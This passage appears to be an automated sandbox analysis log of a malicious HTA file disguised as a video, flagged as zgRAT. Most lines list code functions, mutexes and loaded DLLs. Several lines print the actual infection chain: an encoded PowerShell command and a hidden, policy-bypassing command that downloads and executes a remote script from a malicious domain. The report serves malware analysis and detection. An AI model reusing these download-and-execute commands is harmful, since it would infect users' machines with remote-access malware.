                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040E6CA10_2_0040E6CA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004136A010_2_004136A0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041E86010_2_0041E860
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043F86010_2_0043F860
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044486010_2_00444860
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041F00010_2_0041F000
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042100010_2_00421000
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043501A10_2_0043501A
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042C0C010_2_0042C0C0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040988010_2_00409880
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043394410_2_00433944
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043F15010_2_0043F150
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041717010_2_00417170
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040391010_2_00403910
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040692010_2_00406920
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004239D010_2_004239D0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043D9D010_2_0043D9D0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004441F410_2_004441F4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044599010_2_00445990
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041D1A910_2_0041D1A9
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043C1A810_2_0043C1A8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004129B210_2_004129B2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041327810_2_00413278
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004042C010_2_004042C0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041CACA10_2_0041CACA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00405AD010_2_00405AD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00415AD010_2_00415AD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042A2D010_2_0042A2D0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041BA9010_2_0041BA90
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004252AA10_2_004252AA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00402B4010_2_00402B40
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00444B5010_2_00444B50
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044536010_2_00445360
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041EBF010_2_0041EBF0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042A3FA10_2_0042A3FA
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00417B8010_2_00417B80
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044239010_2_00442390
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040BC4E10_2_0040BC4E
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041F46010_2_0041F460
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042946410_2_00429464
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041840D10_2_0041840D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043CC1310_2_0043CC13
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042941010_2_00429410
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00444C1010_2_00444C10
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040842010_2_00408420
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00441C2010_2_00441C20
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040ACD010_2_0040ACD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004224E010_2_004224E0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042BCE110_2_0042BCE1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040649010_2_00406490
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040949010_2_00409490
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041AC9010_2_0041AC90
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004324A010_2_004324A0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00445CA010_2_00445CA0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042754010_2_00427540
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043656010_2_00436560
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041653010_2_00416530
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00438D3010_2_00438D30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00419DD810_2_00419DD8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00404DF010_2_00404DF0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042AE0710_2_0042AE07
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042BE1810_2_0042BE18
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043861810_2_00438618
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004456D010_2_004456D0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041F68010_2_0041F680
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00423F7010_2_00423F70
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043D77010_2_0043D770
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041DF7510_2_0041DF75
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044477010_2_00444770
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042CF7C10_2_0042CF7C
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040770010_2_00407700
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00415F0210_2_00415F02
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00402F1010_2_00402F10
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00433F3510_2_00433F35
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00438FC010_2_00438FC0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00408F8010_2_00408F80
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00415AC0 appears 130 times
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00408230 appears 46 times
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 27174
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 27174Jump to behavior
                          Source: 5.2.powershell.exe.c973628.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: Process Memory Space: powershell.exe PID: 4628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@12/8@3/3
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043E350 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,10_2_0043E350
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aewqqepo.21w.ps1Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\title.mp4.hta"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(-5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } @keyframes eye-2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>Error 404</h1> <h3>Object not found</h3> </div> <div> <p> This object does not exist or is not publicly accessible at this URL. Check the URL of the object that you're looking for or contact the owner to enable Public access. </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(-5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } @keyframes eye-2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>Error 404</h1> <h3>Object not found</h3> </div> <div> <p> This object does not exist or is not publicly accessible at this URL. Check the URL of the object that you're looking for or contact the owner to enable Public access. </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
